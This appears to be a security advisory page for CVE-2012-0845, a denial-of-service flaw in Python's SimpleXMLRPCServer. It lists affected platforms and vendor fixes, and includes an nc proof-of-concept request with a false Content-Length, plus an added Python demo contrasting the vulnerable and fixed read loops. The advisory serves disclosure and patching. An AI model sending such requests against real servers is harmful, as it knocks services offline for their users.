Python SimpleXMLRPCServer Denial Of Service Vulnerability
BID:51996
Info
| Bugtraq ID: | 51996 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | CVE-2012-0845 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2012 12:00AM |
| Updated: | Apr 13 2015 08:30PM |
| Credit: | Dan Callaghan |
| Not Vulnerable: | |
Vulnerable:
- Ubuntu Ubuntu Linux 11.10 i386
- Ubuntu Ubuntu Linux 11.10 amd64
- Ubuntu Ubuntu Linux 11.04 powerpc
- Ubuntu Ubuntu Linux 11.04 i386
- Ubuntu Ubuntu Linux 11.04 ARM
- Ubuntu Ubuntu Linux 11.04 amd64
- Ubuntu Ubuntu Linux 10.04 sparc
- Ubuntu Ubuntu Linux 10.04 powerpc
- Ubuntu Ubuntu Linux 10.04 i386
- Ubuntu Ubuntu Linux 10.04 ARM
- Ubuntu Ubuntu Linux 10.04 amd64
- Sun Solaris 11
- Sun Solaris 10
- Red Hat Enterprise Linux Workstation Optional 6
- Red Hat Enterprise Linux Workstation 6
- Red Hat Enterprise Linux Server Optional 6
- Red Hat Enterprise Linux Server 6
- Red Hat Enterprise Linux HPC Node Optional 6
- Red Hat Enterprise Linux HPC Node 6
- Red Hat Enterprise Linux Desktop Optional 6
- Red Hat Enterprise Linux Desktop 6
- Python Software Foundation Python 3.2.2
- Python Software Foundation Python 2.7.2
- Oracle Enterprise Linux 6.2
- Oracle Enterprise Linux 6
- Mandriva Linux Mandrake 2011 x86_64
- Mandriva Linux Mandrake 2011
- Mandriva Linux Mandrake 2010.1 x86_64
- Mandriva Linux Mandrake 2010.1
- MandrakeSoft Enterprise Server 5 x86_64
- MandrakeSoft Enterprise Server 5
- Gentoo Linux
- Avaya Aura Experience Portal 6.0
Discussion
Python's SimpleXMLRPCServer module is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending a specially crafted HTTP POST request.
Successful exploits will allow attackers to cause a denial-of-service condition (excessive CPU usage, as the vendor references describe it).
Python versions 2.7.2 and 3.2.2 are vulnerable; other versions may also be affected.
Exploit / POC
An attacker can use readily available tools to exploit this issue.
The following exploit is available:
$ echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345
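The proof of concept above declares a Content-Length of 100 but sends a 7-byte body and closes the connection. What follows is an added example written for this page, not code from the advisory, the vendors or CPython: a request-body reader in the shape of the SimpleXMLRPCServer POST handler's read loop. Without a guard, the loop keeps calling read() after the peer has gone away, gets an empty result every time and spins on the CPU; with the one-line guard (stop when a read returns no data, which is what CPython's fix for this issue does) the handler finishes the request with a truncated body instead. The function names, the `spin_limit` cap that lets the unguarded variant terminate in a demo, and the request bytes are all constructed for the illustration.

```python
import io

# Added example (not from the advisory or CPython). Reads a POST body the way
# SimpleXMLRPCServer does, in bounded chunks, and shows why an empty read must
# end the loop.

MAX_CHUNK = 10 * 1024 * 1024  # chunked reads bound memory, as the stdlib does

# Constructed request mirroring the advisory's PoC: Content-Length says 100
# bytes, the body is 7 bytes, and the client then closes the connection.
CONSTRUCTED_REQUEST = b"POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye"


def split_request(raw):
    """Return (declared Content-Length, file-like body) for a raw HTTP request.

    io.BytesIO stands in for the socket's rfile: once the bytes are exhausted,
    read() returns b"" just as a closed socket would.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return length, io.BytesIO(body)


def read_body(rfile, content_length, break_on_eof=True, spin_limit=1000):
    """Read up to `content_length` bytes from `rfile`.

    Returns (body, truncated, iterations).  With break_on_eof=True an empty
    read ends the loop (the fixed behaviour).  With break_on_eof=False the loop
    keeps reading after EOF, which is the defect behind the advisory; the
    spin_limit cap exists only so this demo terminates, the real defect has no
    such exit and burns CPU until the process is killed.
    """
    chunks = []
    size_remaining = content_length
    iterations = 0
    truncated = False
    while size_remaining:
        iterations += 1
        chunk_size = min(size_remaining, MAX_CHUNK)
        chunk = rfile.read(chunk_size)
        if not chunk:
            # The peer closed before the declared length arrived.
            truncated = True
            if break_on_eof:
                break
            if iterations >= spin_limit:
                break  # demo-only cap; see docstring
            continue
        chunks.append(chunk)
        size_remaining -= len(chunk)
    return b"".join(chunks), truncated, iterations


def demo(break_on_eof=True):
    """Run the constructed PoC request through the reader."""
    length, rfile = split_request(CONSTRUCTED_REQUEST)
    return read_body(rfile, length, break_on_eof=break_on_eof)


if __name__ == "__main__":
    body, truncated, loops = demo(True)
    print("guarded:  body=%r truncated=%s loops=%d" % (body, truncated, loops))
    body, truncated, loops = demo(False)
    print("unguarded: body=%r truncated=%s loops=%d (capped)" % (body, truncated, loops))
```

A handler that gets `truncated=True` back should reject the request (the XML-RPC payload is incomplete anyway) rather than try to parse it; the point of the guard is that the decision is reached after two reads instead of never.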
Solution / Fix
Solution:
Updates are available. Please see the references for more information.
MandrakeSoft Enterprise Server 5 x86_64
- Mandriva lib64python2.5-2.5.2-5.12mdvmes5.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva lib64python2.5-devel-2.5.2-5.12mdvmes5.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-2.5.2-5.12mdvmes5.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-base-2.5.2-5.12mdvmes5.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-docs-2.5.2-5.12mdvmes5.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-2.5.2-5.12mdvmes5.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-apps-2.5.2-5.12mdvmes5.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
MandrakeSoft Enterprise Server 5
- Mandriva libpython2.5-2.5.2-5.12mdvmes5.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva libpython2.5-devel-2.5.2-5.12mdvmes5.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-2.5.2-5.12mdvmes5.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-base-2.5.2-5.12mdvmes5.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-docs-2.5.2-5.12mdvmes5.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-2.5.2-5.12mdvmes5.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-apps-2.5.2-5.12mdvmes5.2.i586.rpm (http://www.mandriva.com/en/downloads/)
Mandriva Linux Mandrake 2010.1 x86_64
- Mandriva lib64python2.6-2.6.5-2.5mdv2010.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva lib64python2.6-devel-2.6.5-2.5mdv2010.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-2.6.5-2.5mdv2010.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-docs-2.6.5-2.5mdv2010.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-2.6.5-2.5mdv2010.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-apps-2.6.5-2.5mdv2010.2.x86_64.rpm (http://www.mandriva.com/en/downloads/)
Mandriva Linux Mandrake 2010.1
- Mandriva libpython2.6-2.6.5-2.5mdv2010.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva libpython2.6-devel-2.6.5-2.5mdv2010.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-2.6.5-2.5mdv2010.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-docs-2.6.5-2.5mdv2010.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-2.6.5-2.5mdv2010.2.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-apps-2.6.5-2.5mdv2010.2.i586.rpm (http://www.mandriva.com/en/downloads/)
Mandriva Linux Mandrake 2011 x86_64
- Mandriva lib64python-devel-2.7.2-2.2-mdv2011.0.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva lib64python2.7-2.7.2-2.2-mdv2011.0.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-2.7.2-2.2-mdv2011.0.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-docs-2.7.2-2.2-mdv2011.0.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-2.7.2-2.2-mdv2011.0.x86_64.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-apps-2.7.2-2.2-mdv2011.0.x86_64.rpm (http://www.mandriva.com/en/downloads/)
Mandriva Linux Mandrake 2011
- Mandriva libpython-devel-2.7.2-2.2-mdv2011.0.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva libpython2.7-2.7.2-2.2-mdv2011.0.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-2.7.2-2.2-mdv2011.0.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva python-docs-2.7.2-2.2-mdv2011.0.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-2.7.2-2.2-mdv2011.0.i586.rpm (http://www.mandriva.com/en/downloads/)
- Mandriva tkinter-apps-2.7.2-2.2-mdv2011.0.i586.rpm (http://www.mandriva.com/en/downloads/)
References
References:
- CVE-2012-0845 python (SimpleXMLRPCServer): DoS (excessive CPU us (Red Hat)
- CVE-2012-0845 Python v2.7.2 / v3.2.2 (SimpleXMLRPCServer): DoS (excessive CPU us (Python Software Foundation)
- Multiple vulnerabilities in Python (Oracle)
- Python Homepage (Python Software Foundation)
- ASA-2012-260: python security update (RHSA-2012-0744) (Avaya)
- Xerox Security Bulletin XRX13-007 (Xerox)